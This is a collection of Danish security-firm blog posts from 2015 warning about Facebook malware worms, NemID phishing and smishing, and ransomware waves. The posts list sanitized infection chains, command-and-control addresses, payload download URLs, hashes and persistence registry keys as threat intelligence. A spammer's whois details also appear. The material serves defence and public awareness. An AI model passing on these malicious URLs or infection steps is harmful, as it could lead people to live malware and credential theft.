Hvis du klikker på denne Facebook tagging flyttes du til en webside hostet i skyen hos Amazon. Fra denne flyttes du med det samme videre til en anden webside, hvorfra der tilbydes en fil med navnet "YoutubePlayer7.exe". Det er den skadelige malware som man skal holde sig fra!


Se infektionskæden herunder (saniteret af CSIS):

http://kx30u4jpu1atq.s3-website-us-east-1[.]amazonaws[.]com
--> http://storage.googleapis[.]com/asdf435sd/i.html?bebehhnfasfasfasvxcbdgeryerfbvcbcvbdfgdsgfdhgf
--> YoutubePlayer7.exe (MD5: 281222bacdb022a9b38978cd2cacd807)

Det pågældende program installerer et browser plugin ved navnet "Dragon City" der anvendes til at sprede det uønskede budskab videre, hvor vilkårlige venner og bekendte tagges i. 

Sexortion værktøj
Men desværre indeholder pakken også funktioner som gør det muligt for bagmanden at aktivere webcam, mikrofon, tage skærmbilleder osv. Det er indlysende hvad det kan føre til i denne sammenhæng. Vi har set flere af den slags blive anvendt i sexortion sager og særligt i en sammenhæng som denne der starter med hardcore pornografisk lokkemad. 

Når "YoutubePlayer7.exe" åbnes af en uforsigtig bruger vil den via et HTTP get hente filen "servant" og kopiere den til: C:Users[brugernavn]AppDataRoamingservant.exe

Den binder sig herefter ind i et BOTnet med (saniteret af CSIS): 
HTTP GET 178.62[.]143.123/durum.php?v=16&unique=53921260&os=7

Dine følsomme data postes til samme server, som befinder sig i Holland, via en HTTP POST mod PHP gatewayen: update.php og indeholder bl.a. brugernavne og passwords som høstes fra den lokale harddisk. 

Der er tale om en væmmelig cocktail, så udvis derfor forsigtighed med at klikke på denne type indhold og åbn aldrig filer hvis indhold du ikke kender.

En del af koden ringer hjem til flere domæner, som vi har blokeret i CSIS Secure DNS og Heimdal PRO/Corporate.

Hovedkomponenten opnår kun begrænset antivirus detektion:
https://www.virustotal.com/en/file/cd4880182db9fc4d31d7e87d8c8fa0e4c7f81825aab56135d008f0e9f9ebae32/analysis/1427285449/

CSIS Blog: Brugerpanelet og Euroads bag phishing lignende kampagne

0
0

I morges modtog CSIS flere henvendelser fra almindelige mennesker som havde modtaget en e-mail med et indhold der i den grad lignede klassisk phishing og med et link inkluderet.

Vi forventede at lande på en phishing side. Men nej. Til vores store overraskelse var det såmænd folkene bag de tvivlsomme kampagner/konkurrencer dirigeret igennem henholdsvis "Euroads" og "Brugerpanelet" som stod bag.

En skærmdump af den pågældende e-mail findes herunder:

Det pågældende link peger på (saniteret af CSIS)
http://link.super-mails.net/link/link.php?[fjernet]

Linket har kun et formål. At identificere brugeren og dernæst videredirigere trafikken til "brugerpanelet":

--> http://tracking.euroads.dk/system/tracking.php?[fjernet]
--> http://konkurrence.brugerpanelet.dk/?[fjernet]


Formålet? Tja, åbenlyst at lokke naive brugere ind i en konkurrence karrusel ved at tilbyde ofret at udfylde en "survey".

Slet den pågældende e-mail.

CSIS Blog: CSIS og kommende sikkerhedskonferencer

0
0

CSIS går en travl tid i møde hvor vi taler på flere spændende og dedikerende it-sikkerhedskonferencer både herhjemme og i udlandet. Vi glæder os til at præsentere dele af den tekniske research vi har lavet indenfor de seneste 6 måneder.   

Den største og vigtigste nyhed er naturligvis at it-sikkerhedskonferencen: "Copenhagen Cybercrime Conference 2015", som ligesom de seneste 2 år, afholdes i København.


Detaljerede oplysninger omkring CCCC15, som finder sted i midten af Juni måned, vil blive udsendt på mandag til vores platinum alert kunder. Den følges op af en pressemeddelelse og oplysninger som offentliggøres her på vores hjemmeside. Det er først til mølle, så hold dig klar ved tasterne mandag! 

Vi glæder os til at løfte sløret for et spændende konference program med en stribe af kendte og respekterede internationale researchere og it-sikkerhedseksperter på talerlisten.

Udover CCCC15 vil CSIS være at finde på følgende konferencer (listen vil opdateres løbende og vil senere blive postet på vores hjemmesider og diverse sociale medier):

IT-Relation formiddagsmøde,
5 Maj 2015 og 19 Maj 2015
http://www.itrelation.dk/invitation-til-gratis-formiddagsmoede-om-it-sikkerhed

CARO Workshop, Hamborg,
11-12 Maj 2015
http://2015.caro.org/

APWG, Symposium on Electronic Crime Research, Barcelona
26-29. Maj 2015:
https://apwg.org/apwg-events/ecrime2015/

DataCloud Europe, Monaco,
3-4 Juni 2015:
http://www.datacloudcongress.com/

FIRST, Berlin,
14-19. Juni 2015
https://www.first.org/conference/2015

Virus Bulletin, Prag,
30. September - 2. Oktober 2015
https://www.virusbtn.com/conference/vb2015/index

IDC IT security, Århus, 6. oktober 2015
(hjemmeside og indhold publiceres senere)

Vi ønsker alle en god og sikker forlænget weekend.

CSIS Blog: Facebook virus spredes i Skandinavien

0
0

En virus/orm har i løbet af weekenden spredt sig blandt brugere på Facebook. Den opnår en viral effekt ved at installere en udvidelse til browseren herunder til Firefox og Chrome. I næste fase tagger den 30-50 af vilkårlige venner og bekendte på Facebook og poster beskeden "Private V1DEO" og en henvisning til Youtube. Det pågældende link peger imidlertid på en URL, som intet har med Youtube at gøre. Se vedhæftede skærmdump.


Infektionskæde er gengivet herunder (saniteret af CSIS):

http://ki[.]je
--> http://tjetri.s3-website-us-west-2.amazonaws[.]com/mf40.html
--> https://cracks4free[.]info
--> https://dl.dropbox[.]com/s/0w6uex0aa8ap098/premiumD.xpi?dl=0

Hvis ofret accepterer, at installere den pågældende udvidelse: "Premium Codec", vil ormen sprede sig til andre brugere på Facebook, hvorved den opnår den virale effekt. Koden er i familien "Kilim".

Udvidelsen henter ledsagende uønsket malware fra følgende websider (saniteret af CSIS):

http://besttoolbars[.]net/commercial_license/
http://crossbrowser[.]com
http://sizzlejs[.]com/

Pakken "premiumD.xpi@dl=0" er i virkeligheden et zip arkiv som indeholder følgende filer:

install.rdf
icon.png
chrome.manifest
chrome [mappe]

Det er muligt for den pågældende udvidelse at opdatere sig selv via en indbygget funktion som også løbende kan poste nyt indhold som spredes via Facebook:



Indholdet fra adeaditi.info, som trækkes ned via SSL (udstedt af Geotrust) er gengivet herunder:


Her ser vi forskellige former for indholdsstyring og tracking.

Komponenten "install.rdf", som også er en del af pakken, anvendes til at installere "Crossbrowser", som er en udvidelse til Chrome der viser reklame indhold baseret på ens interesser og søgekriterier. Et udsnit af denne kode findes herunder:

000000C9  <em:id>Premium_Codec@CrossBrowser</em:id>
000000F6  <em:type>2</em:type>
0000010E  <em:name>Premium Codec</em:name>
00000132  <em:description>Premium_Codec</em:description>
00000164  <em:creator>CrossBrowser</em:creator>
0000018D  <em:homepageURL>http://crossbrowser.com</em:homepageURL>
000001C9  <em:version>1.0.0.0</em:version>
000001ED  <em:contributor></em:contributor>
00000212  <em:iconURL>chrome://Premium_Codec/content/default_app_icon_32x32.png</em:iconURL>
00000268  <em:targetApplication>
00000283  <Description>
00000296  <em:id>{ec8030f7-c20a-464f-9b0e-13a3a9e97384}</em:id>
000002D1  <em:minVersion>4.0</em:minVersion>
000002F9  <em:maxVersion>9.*</em:maxVersion>
00000320  </Description>
00000332  </em:targetApplication>
0000034C  </Description>
0000035C  </RDF>

CSIS beskytter mod denne trussel i Heimdal PRO og CSIS Secure DNS og har blokeret for samtlige dedikerede websider/domæner som anvendes af Kilim.

Virus detektion af udvidelsen giver (10/56):
https://www.virustotal.com/en/file/37731bd0987cd1a3577d32183b226cda1b5113ea47eaf71acc982290b559f397/analysis/1430640309/

Vi har forøvrigt tidligere advaret omkring denne virus/orm:
https://www.csis.dk/da/csis/blog/4530/

CSIS Nyheder: International sikkerhedskonference i København

0
0

I Juni måned er København værtsby for en international konference med fokus på it-sikkerhed. Konferencen er etableret i samarbejde mellem CSIS, DI ITEK og Erhvervsstyrelsen og tiltrækker flere af verdens førende eksperter og forskere indenfor dette felt.

CSIS Security Group A/S er begejstrede over at kunne annoncere årets Copenhagen Cyber Crime Conference 2015 (CCCC-15). CCCC-15 afholdes i hjertet af København i Dansk Industris hovedkvarter, torsdag d. 11. Juni 2015 mellem kl 8.00 og ca. 17.30.

I lighed med tidligere år er konferencen inddelt i tre spor og vil byde på anerkendte internationale it-sikkerhedseksperter, -researchere og -forskere fra mange lande og forskellige markedsledende selskaber. Alle præsentationer afholdes på engelsk.

Mere viden - ingen salgsgas!
Der vil være noget for enhver smag på CCCC-15 fra best practices, management og compliance til tung teknisk analyse af avanceret og komplekse angreb mod offentlige og private selskaber. "Vi har forsøgt at samle de førende it-sikkerhedseksperter og researchere til denne konference. Der skal ikke sælges produkter på CCCC-15, men derimod deles viden" fortæller Peter Kruse, som er partner og it-sikkerhedsekspert i CSIS.

Keynote fra Microsoft DCU
Det er i år lykkedes CSIS at tiltrække Richard Boscovich fra Microsofts særlige Digital Crimes Unit (DCU). Richard har været en ledende kraft i de legale aspekter omkring nedtagningen af kraftfulde BOTnets som f.eks. Waledac, Rustock, Kelihos, Bamital, Nitol, Zeus Gameover, Shylock og senest Ramnit.

Derudover er der på CCCC-15 spændende talere fra bl.a. Sophos, ESET, Farsight Security, G Data, TDC, Cyphort Inc., Cryptomathic, Kaspersky, NC3 samt mange flere.


Yderligere oplysninger, agenda samt tilmelding kan ske på konferencens hjemmeside:
http://cccc-2015.com/


CSIS Blog: Bølge af Smishing angreb mod Danmark

0
0

Smishing er identisk med phishing, men er i stedet for at blive båret via e-mails leveres de istedet via SMS beskeder. Målet er at fiske brugernavne og passwords fra ofret og i denne sammenhæng også NemID nøglekort.

Smishing, som teknik i forsøg på at franarre følsomme oplysninger fra naive ofre, har været praktiseret siden 2002-2003, men herhjemme i Danmark har vi hidtil været relativt forskånet for denne type svindel, som kan sammenstilles med phishing.

De IT-kriminelle, som står bag denne kampagne, har åbenlyst købt sig til en mobiltelefon database indeholdende numre og navne, så SMS'erne der udsendes kan udformes med navnet på modtageren, sammen med et link der skal klikkes på.

Det pågældende link kan eksempelvis være forkortet via bit.ly med formålet at videredirige til en kompromitteret webside, som foregiver at være en bank eller virksomhed som ofret generelt har tillid til. Som det fremgår af nedenstående skærmdump lokkes ofret til at opgive NemID brugernavn og password sammen med en kopi af det private NemID nøglekort.


CSIS har allerede nedskudt flere af disse kampagner hen over den forløbne uge, men bagmændene fortsætter med at udsende de uønskede SMS beskeder med nye links til nye numre hvorved dette er en vedvarende trussel som almindelige brugere skal være yderst opmærksomme på og slette hvis de modtages. Man skal ikke forsøge at svare tilbage eller klikke på det medfølgende link og man skal slet ikke opgive følsomme private oplysninger som fiskes på denne måde.

Vi har blokeret flere end 10 domæner anvendt i denne kampagne i CSIS Secure DNS og Heimdal PRO.

CSIS Nyheder: Ransomware ødelægger sommerferien

0
0

IT-krimielle har, ligesom varmen skruet op for charmen, men det er ikke en rar oplevelse, som man vil ønske sig besøg af midt i en periode med sommerferie.

Ransomware er særligt i denne sommerperiode en helt overskyggende trussel mod danske virksomheder og offentlige myndigheder og de it-kriminelle lancerer kampagnerne i kaskader og med en høj grad af kreativitet. Vi har paraderne nede og det udnyttes!

Dette indlæg vil ikke gå i tekniske detaljer omkring den binære payload i ransomware. Alle kendte og persistente ransomware varianter har vi allerede pillet fra hinanden og analyseret. Der er udsendt i massevis af tekniske artikler på vores platinum alert liste. Hvis man ønsker at vide mere om CSIS platinium alert, så kontakt os via vores hjemmeside: https://www.csis.dk/da/csis/contact/

Tre Randomware familier rammer Danmark
Ransomware, som rammer Danmark er groft fordelt i tre malware familier: Cryptowall, CTB-Locker og FileCoder. De spredes via to centrale metoder: spamkampagner med vedhæftede filer og ved brug af "drive-by" angreb.

Høj kreativitet
Når vi taler om kreativitet ses det bl.a. ved den seneste kampagne som er blevet skudt i gang i dag. Denne anvender Google Drive som platform til infektionen. Den første fase udføres ved at indlejre scripts på legitime websider. Disse scripts flytter ofret (uden dennes viden) over på et større antal dedikerede domæner, som udfra en stribe kriterier, hverunder browsertype og GeoIP, bestemmer hvordan maskinen skal beskydes og ikke mindst hvilken payload der skal leveres. I den konkrete kampagne er der gjort brug af RIG exploitkit som beskyder Flash Player, JavaJRE og Adobe Reader. Er systemet sårbart leveres payloaden som trækkes fra Google Drive. Et saniteret udsnit herunder:

https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBQm1XcVZ3SXhwdlk
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBQnVhbFR0NXhSa2s
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBR2ZvZkJRWHprNk0
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBRE1KZGNUYkpWb1U
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBSFNURHVhal8zV2s
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBUFh4X20xZU5sclE
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBVDJ3d1FEbFdRSEk
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBc2NoVFgtNnlhNk0
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBcHUxd0toanNBNVE
https://drive.google[.]com/uc?export=download&id=0B0VtiEw2UiuBdFZzSUxad2I2aWM   

Disse URLs returnerer en dropper "resume.zip" (my_resume_pdf_id-4535-4553-293.scr). Denne forbinder sig herunder til en stribe kompromiterede websider, hvor den henter og kører Cryptowall3. Et lille udsnit herunder (saniteret af CSIS)

http://furnishingsuk[.]com/wp-includes/certificates/e2.php
http://getstarstar[.]com/wp-content/plugins/e5.php 
http://henleybond[.]com/wp-includes/js/tinymce/plugins/e1.php 
http://izzhoga[.]su/css/e5.php 
http://lovetarianway[.]com/wp-includes/js/tinymce/plugins/e3.php 
http://mccollougharchitecture[.]com/wp-content/uploads/2014/04/e2.php

Fra det øjeblik er Cryptowall3 på maskinen og vil injekte sig i "dwwin.exe" processen, mens den spawner en process der igangsætter selve kryptering af data lokalt og i det tilgængelige netværk. Den vil samtidig sprede sin binære kode via den selvsamme metode hvorved nye ofre i netværket kan eksponeres for koden.

Risiko for datalækage
Cryptowall opnår generelt kun begrænset antivirus detektion i infektionsvinduet. De seneste varianter af Cryptowall indeholder forskellige funktioner der kan åbne for fjernadministration af inficerede maskiner i netværket, ligesom den er i stand til at mutere. Det kan udover kryptering af data også føre til datalækage.

CSIS har blokeret alle kendte Cryptolocker domæner i CSIS Secure DNS hvilken også beskytter brugere af Heimdal PRO og corporate.

Gode råd:
1) Sikre at virksomhedens backup systemer fungerer og gennemfører en test inden man tager på sommerferie.
2) Etabler en incident reponse funktion, så man rettidigt og korrekt kan bremse denne trussel i en tidlig fase af komrpomittering.
3) Etabler og sikre at firmaet har patch management på plads så sårbart software, som misbruges til at plante denne trussel, er behørigt opdateret
4) Bloker domæner på perimeter som anvendes til at levere ransomware
5) Sikre, at mailgateway eller leverandør, har filtype politik på plads og at der scannes med en eller flere antivirus løsninger
6) Skab awareness for brugere så de ikke ukritisk klikker på alt der modtages via eksempelvis e-mail
7) Find en it-sikkerhedspartner som teknisk er i stand til at isolere og håndtere disse angreb, så nedetid følgeskader begrænses til et minimum

Mere læsning om Ransomware fra CSIS:
https://www.csis.dk/da/csis/blog/3655/
https://www.csis.dk/da/csis/news/3528/
https://www.csis.dk/da/csis/blog/4577/

CSIS Blog: Websider i Danmark leverer ransomware

0
0

Mange danske virksomheder og kommuner har bøvlet med ransomware i sommerferien. I særdeleshed har kidnapningssoftwaren "Cryptowall3" været særligt aktiv, og det er der en god grund til. I det følgende finder du årsagen.

CSIS har analyseret de akutuelle incidents, som vi har været involveret i, og der tegner sig et tydeligt mønster.

Alene herhjemme i Danmark er flere end 250 websider blevet systematisk kompromitteret, og it-kriminelle har brugt denne lejlighed til at indsætte et ondsindet script (se skærmdump herunder) flere centrale steder på websiden.


Det pågældende script (base64 kodet) flytter brugeren til det kommercielle exploitkit, kendt som AnglerEK, via forskellige domæner som løbende roterer.

Som nævnt har vi positivt bekræftet flere end 250 websider herhjemme i Danmark - og flere end 70.000 på globalt plan.

Herunder et lille udsnit af websider herhjemme, som desværre også tæller flere store og velbesøgte websites, hvilket forklarer det stigende antal af incidents relateret til Cryptowall3 ransomwaren:

kunde[.]statoil[.]dk
p360[.]dk
plo-e[.]dk
slankeklubben[.]dk
blitz[.]envo[.]dk
f35[.]dk
videoad[.]dk
matchbiler[.]dk
socval[.]dk
bandana[.]minus-akasse[.]dk
peterpackroff[.]dk
danskemarketing[.]dk
agrodata[.]dk
biostata[.]dk
bisontelt[.]dk
heatweed[.]dk
foodsense[.]dk
thermo-fug[.]dk
pjank[.]dk
cuma[.]dk
paraplyshop[.]dk
eventcom[.]dk
riven[.]dk
nemliga[.]dk
danskenetspil[.]dk

AnglerEK beskyder Flash og Java
AnglerEK affyrer exploits rettet mod nyere versioner af Flash Player og JavaJRE. Hvis systemet er sårbart vil dette tvangsfodre maskinen med Cryptowall3. Se tidligere analyse af Cryptowall varianter som er postet på vores webside eller udsendt via vores platinum alert service.

Vores analyse afslører, at de mange kompromitterede websider kører CMS software som ikke er behørigt opdateret. Derved er det lykkedes at lave masse kompromitteringer og injekte det uønskede script på de mange websider. Blandt de positive mål, som udsættes for automatiseret kompromittering, finder vi: Wordpress, Joomla, Drupal m.fl.

AnglerEK leverer kun payloaden en gang per IP adresse som besøger EK gatewayen. Den indeholder derudover en lang blackliste over IP adresser, som aldrig modtager nogen payload, og det besværliggør indlysende reproduktion af payloaden. 

Antivirus detektion for AnglerEK er generelt lav og payloaden roterer løbende, hvilket betyder at den rette løsning er at implementere fuld patch management af kritiske trejdepartsprodukter hen over hele netværket samt eksterne arbejdsspladser, og med særlig vægt på Flash Player, Adobe Reader/Acrobat og JavaJRE. Det er samtidig vigtigt også at opprioritere fokus på webserver sikkerheden og navnligt applikationer som tjener til formålet at styre og ændre indholdet på websiderne. Hvis disse applikationer ikke er korrekt opdateret - eller plugins er installeret uden at de er blevet løbende vedligeholdt - er det en tikkende bombe under virksomheden, som kan skade besøgende og samarbejdspartnere.

Alle skadelige domæner er blokeret i CSIS Secure DNS og Heimdal. 

Virksomheder, som ikke gør professionelt brug af Flash Player, kan overveje at afinstallere/deaktivere dette plugin.

CSIS Nyheder: Smishing bølge rammer Danmark

0
0

CSIS har opsamlet og analyseret en ny "Smishing" kampagne som skydes ud mod mobiltelefoner i Danmark via SMS. Målet er at fiske brugernavn og password samt nøglekort til NemID. Smishing er et fænomen hvor der sendes en SMS til vilkårlige modtagere og som ligesom klassisk phishing så lokker modtageren til at opgive sensitive oplysninger.

Den pågældende SMS afsendes spoofet fra en SMS gateway der skjuler SenderID hvorfor den ser ud til at komme fra NemID.

Se skærmdump af SMS modtaget på en iPhone:


Det pågældende link er en URL-forkorter som flytter trafikken videre til en hacket WordPress side (saniteret af CSIS):

http://bit[.]ly/1LZbH3T
-->
http://www.aiyachtclub[.]com/nemid/run/update/ca906658cc22ae7d37cecb0555b20f84/mpp/update/

På en Apple iPhone ser den forfalskede webside ud som følgende. Bemærk, at der med denne kampagne også er medtaget forsøg på at lokke naivne ofre til at uploade deres NemID kort.


Det pågældende domæne er allerede blokeret i CSIS Secure DNS og dermed er også Heimdal PRO brugere beskyttet.

Data som indtastes på den forfalskede webside, sendes til en PHP gateway på følgende adresse (saniteret af CSIS)
http://juppifruit[.]nl/get.php

Også dette domæne er blokeret i CSIS Secure DNS.

Vi har tidligere advaret flere gange omkring Smishing angreb:
https://www.csis.dk/da/csis/blog/4659/

Slet disse uønskede beskeder og alternativt rapporter forsøg til phishing_@_csis.dk.

CSIS Blog: Nyt Facebook tema er phishing

0
0

Vi har set mange friske apps, som henover det seneste år har lokket naive Facebook med at kunne ændre udseenet på Facebook. Typisk er lokkemaden at disse app's kan anvendes til at få nye farver og et anderledes frisk look af Facebook. Når denne kampagne, som netop nu er skudt i gang, spreder sig blandt Facebook brugere hævder den bl.a. "Aldrig mere samme kedelige blå tema".

Som altid er det dog et fluepapir, og den pågældende kampagne har et helt andet formål: at indsamle dit brugernavn og password og sprede sig til andre godtroende Facebook brugere.

Hele denne phishing kampagne (som vi vist roligt kan kalde den) udspringer via websiden: facebooktheme.net. Websiden gør ikke brug af en app men derimod regulær phishing til at sprede sig videre til andre brugere. Se skærmdump herunder:


En interessant observation i forhold til den pågældende fupside er de registrerede whois data:

Domain Name: FACEBOOKTHEME.NET
Registry Domain ID: NA
Registrar WHOIS Server: whois.enom.com
Registrar URL: www.enom.com
Updated Date: 2015-09-09T04:20:00.00Z
Creation Date: 2015-09-09T11:20:00.00Z
Registrar Registration Expiration Date: 2016-09-09T11:20:00.00Z
Registrar: ENOM, INC.
Registrar IANA ID: 48
Reseller: NAMECHEAP.COM
Domain Status: clientTransferProhibited https://www.icann.org/epp#clientTransferProhibited
Registry Registrant ID:
Registrant Name: BILL LIEW
Registrant Organization:
Registrant Street: PUDONG AVENUE 599
Registrant City: SHANGHAI
Registrant State/Province: NONE
Registrant Postal Code: 200120
Registrant Country: CN
Registrant Phone: +86.1381607021
Registrant Phone Ext:
Registrant Fax: +86.13816070219
Registrant Fax Ext:
Registrant Email: bill.liew@hotmail.com

Er det ikke samme e-mail adresse, som bl.a. står bag: viralpop.com, meetthemes.com, sugiharaanri.com? Jo, præcist og dem skal man også holde sig fra!

På facebooktheme.net lokkes ofret til at logge på Facebook, hvorved at login data som brugernavn og password, overdrages til trejdepart. I næste fase anvendes de login oplysninger som man netop har givet bagmændene til at sprede budskabet videre til andre Facebook brugere med følgende indhold:


Godt råd:
Hvis du ser venner og bekendte sprede dette indhold, så fortæl dem at de skal skifte deres brugernavn og password til Facebook.

Vi har blokeret det pågældende domæne i CSIS Secure DNS og i Heimdal PRO/corporate for at beskytte vores kunder mod datalækage og kontoovertagelse.

Du skal aldrig opgive dit brugernavn og password på websider, som ikke tilhører Facebook, ligesom en god ide er at aktivere 2-faktor autentifikation. Det yder et ekstra lag af sikkerhed.

CSIS Nyheder: Phishing lokker stadig

0
0

Vi har været ude med talrige advarsler omkring phishing og faren ved at lade sig lokke til at klikke ukritisk på links i uønskede e-mails. De phishing kampagner som målrettes Danmark er rent trækplaster for mange nysgerrige danskere. Det skal helst ændre sig. Det er en farlig leg.

I denne artikel kigger vi på lidt statistik, som vi har opsamlet i forbindelse med en phishing kampagne, som rullede ind over Danmark i sidste uge. Lokkemaden var en e-mail, som foregav at komme fra NETS. Som hovedparten af andre phishing kampagner, rettet mod Danmark, er det uønskede og forfalskede indhold hostet på en kompromitteret hjemmeside. Her skal ofret lokkes ind og skræmmes/lokkes til at indtaste brugernavn og password til NemID. Det alene gør det naturligvis ikke, da ofret i næste fase også lokkes til at tage et billede af sit nøglekort, og uploade det via den forfalskede webside. Med de to vigtige og personlige oplysninger i hånden kan de it-kriminelle gennemføre alle tænkelige transaktioner, ja reelt overtage ofrets identitet. Men hvor mange besøger så reelt disse phishing sider? Er vi ikke blevet kloge nok til at gennemskue denne type svindel? Her taler vores statistik desværre sit helt tydelig sprog.

1038 kliks på 36 minutter!
I den konkrete måling, gennemført af CSIS med hjælp fra en hosting udbyder, som ufrivilligt havde phishing indholdet hostet, kan vi afsløre at der i den konkrete NETS phishing kampagne blev observeret ikke færre end 1038 unikke besøgende indenfor blot 36 minutter. Det er rigtigt mange naive kliks. De mange besøgende kommer, som det ses af illustrationen herunder, fra alle dele af landet, og dog med en høj koncentration omkring region hovedstaden.


Det er indlysende ikke alle, som går hele vejen og - udover at besøge den forfalskede webside, så også videregiver yderst personlige oplysninger til de it-kriminelle. Vi gætter på, at hovedparten af de personer som klikker på disse links, reelt blot er nysgerrige. Men det kan være risikabelt at klikke på links man modtager i uønskede e-mails.

Kønsfordeling og alder
Vi kan endda gå endnu dybere, og se nærmere på f.eks. kønsfordeling og alder. Her gælder det naturligvis de ofre, som har været letsindige nok til at videregive oplysninger til disse forfalskede websider.


Risikabelt at klikke hovedløst på links
En anden statistik, som er baseret på tal indsamlet over hele 2014 afslører nemlig, at flere end 73,4% af alle infektioner sker ved at it-kriminelle misbruger huller i ikke opdateret software. Det er den type angreb som vi kalder "drive by" angreb og de udføres netop ved at lokke et offer ind på en webside og derfra forsøge at tvangsfodre maskinen med malware/virus. Det kan bl.a. ske hvis ofret ikke har opdateret vigtige trejdepartsprogrammer sm f.eks. Adobe Flash Player, Adobe Reader/Acrobat, Microsoft Silverlight, JavaJRE, Quicktime og browseren.

Beskyt dig med Heimdal
Når vi kan dokumentere, at så mange klikker på links i uønskede e-mails, er en naturlig foranstaltning og krav, at man som minimum sørger for at vigtige programmer er korrekt opdaterede. Og til det formål har vi udviklet Heimdal Security Agent. Det lille brugervenlige værktøj kan hentes helt gratis og bruges til privat formål. Hvis du vil vide mere om Heimdal, så besøg hjemmesiden på: https://heimdalagent.com.

Sådan undgår du at blive svindlet - et par gode råd
- Slet spam. Undlad at åbne spammails. Du skal afstå fra at klikke på indhold eller svare på uønsket post da det blot bekræfter at du modtager dem med den konsekvens at du kan risikere at modtagere endnu mere.

- Du skal ikke klikke ukritisk på links i mails, tekstbeskeder, popup-vinduer eller chatbeskeder. Hvis du modtager en e-mail fra en bank eller offentlig myndighed, som skræmmer dig til at ændre password, så besøg istedet hjemmesiden via browserens adressefelt eller brug den vej eller det bogmærke, som du er vant til.

- Du skal også udvise forsigtighed og sund fornuft med at klikke ukritisk på vedhæftede filer. En stor del af de grimme trusler kommer via spammails med vedhæftede filer som lokker med alt lige fra en pakke, fax, bestilling, rejse osv. En stor andel af disse spammails ankommer som f.eks. en zip fil men de mere raffinerede kan sagtens ankomme som dokumenter.

- Vær forsigtig, når du giver personlige eller finansielle oplysninger fra dig online.

- Vælg et godt password og lad være med at bruge det samme password til både din bank og på tværs af andre websider.

- Undlad at anvende netbank, online shopping eller betale regninger, hvis du sidder på en offentlig eller delt computer, eller over et åbent trådløst netværk.

Sikker post og chat med Ghostmail
Som en ekstra sikkerhed har CSIS også været med til at udvikle en sikker og brugervenlig e-mail og chat tjeneste, som hedder Ghostmail. Den er gratis, og du kan tilmelde dig, kvit og frit via: https://www.ghostmail.com

CSIS Nyheder: Danmark ramt af ransomware bølge

0
0

CSIS løfter med øjeblikkelig virkning vores trusselsvurdering fra medium til høj. Det sker som konsekvens af en ny massiv spambølge som i dag rammer Danmark og som leverer rendyrket og ondsindet ransomware. Vi har flere virksomheder, som i dag har henvendt sig til CSIS, og som ønsker hjælp efter de er ramt af denne ransomware. 

Den pågældende spammail foregiver at komme fra PostNord/Postdanmark. Med den uønskede e-mail følger et link, som hvis klikkes på, vil flytte ofret over på en webside, hvorfra man vil blive tilbudt filen "forsendelse.zip -> forsendelse.exe".


Infektionskæde, ved et klik på ovenstående link, er gengivet herunder:

http://dshome.ru/cLkKV6jnihC5g.php?id=(email adresse på modtageren)
(1)  --> postdanmark-portal.com -> forsendelse.zip
(2)  --> sync.security.pp.regruhosting.ru

Hvis denne fil åbnes af en uforsigtig bruger (og flere advarsler ignoreres) vil en ransomware med navnet "crypt0l0cker" droppes til maskinen. Denne malware vil injekte sig i flere processer og dernæst igangsætte kryptering af data lokalt samt på alle tilgængelige netværksressourcer. Det kan føre til tab af data og give massive driftsforstyrrelser.

Det pågældende link anvender en "jumpstation" med en referal til [%modtager e-mailen%] (derved bekræfter de også at modtageren er aktiv), som har klikket på linket. Referal ID'et skaber en base64 kodet identifikator, som gør at ransomwaren kun tilbydes en gang. Hvis man efterfølgende forsøger at genskabe problemet, og forsøger at hente koden vil man blive videredirigeret til Google. Snedigt.

Den binære kode kopierer sig til windows mappen med et vilkårligt filnavn f.eks."ohuhycpg.exe", hvorefter den forbinder sig til en server i Rusland på IP adressen (saniteret af CSIS): 109.120[.]155.159. Det sker ved at injekte sig i explorer.exe processen. Serveren oversættes via DNS fra følgende domæner: 

ejkoesc[.]net
oroxwey[.]com 
mqweodhy[.]com


Alle kidnappede data vil blive tilføjet filendelsen ".encrypted". Samtidig opretter den filen "HOW_TO_RECOVER_FILES.html" på skrivebordet. Denne fil indeholder instruktioner om betaling for at opnå adgang til data. Se skærmdump herunder:


Koden opretter en runas værdi som sikrer at koden aktiveres ved en genstart af maskinen:
HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\WindowsCurrent\Version\Run agukelub

Den deaktiverer endvidere diverse antiphishing filtre f.eks. i IE:
HKEY_USERS\Software\Microsoft\Internet Explorer\PhishingFilter Disabled

Vi har blokeret disse domæner i CSIS Secure DNS. Antivirus detektion er yderst lav.
https://www.virustotal.com/da/file/1b41c32c55de43ddb3871260fd0ea30d067dc27840b7f63d857afa7f9267c73a/analysis/1442488273/

Derudover har vi blokeret for mere end 100 domæner der anvendes som "jumpstationer" i CSIS Secure DNS og Heimdal PRO/corporate.


CSIS Blog: Nye PostDanmark bølger

0
0

En sværm af nye Postdanmark/PostNord spamkampagner har kostet flere virksomheder herhjemme massive driftsforstyrrelser her til morgen. Den nye kode er blevet finpudset på flere omrpder og det danske sprog er blevet markant forbedret hvilket øger risikoen for at brugere klikker på de skadelige e-mails.

I går aftes kl. 20.34 opsamlede CSIS de første spammails relateret til en ny spambølge som foregiver at komme fra Postdanmark/Postnord. I lighed med tidligere kampagner inkluderer den uønskede e-mail et link. Hvis det pågældende link, klikkes på, af en uforsigig bruger, vil denne via en mellemstation flyttes over på et domæne der leverer en ransomware i Cryptolocker2 familien. Også denne kampagne har desværre held med at ramme mange danske virksomheder, og vi har modtaget talrige henvendelser hen over formiddagen i dag.

Den uønskede e-mail ankommer med emnelinjen:
"PostNord - Forsendelse meddelelse"

Som tidligere nævnt anvendes et link, som via en mellemstation, sender ofret videre til den skadelige kode.

I første fase anvendes følgende mellemstationer (udsnit):

http://perevozki.org
http://mycolledge.org
http://spectronlab.ru

- hvor et PHP script eksempelvis "1ebiljse.php" flytter trafikken til et af følgende domæner:

postdanmark-portal24.net
postdanmark-portal24.com

Payloaden hentes i sidste fase fra: "downloader.disk.yandex.com" som "forsendelse.zip = forsendelse.exe". Det snedige er at ofret skal indtaste en "captcha" inden filen tilbydes.

Se skærmprint af den skadelige webside herunder:


